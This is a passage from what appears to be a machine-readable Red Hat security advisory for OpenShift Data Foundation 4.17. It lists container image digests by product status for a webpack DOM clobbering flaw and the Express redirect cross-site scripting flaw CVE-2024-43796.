"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", 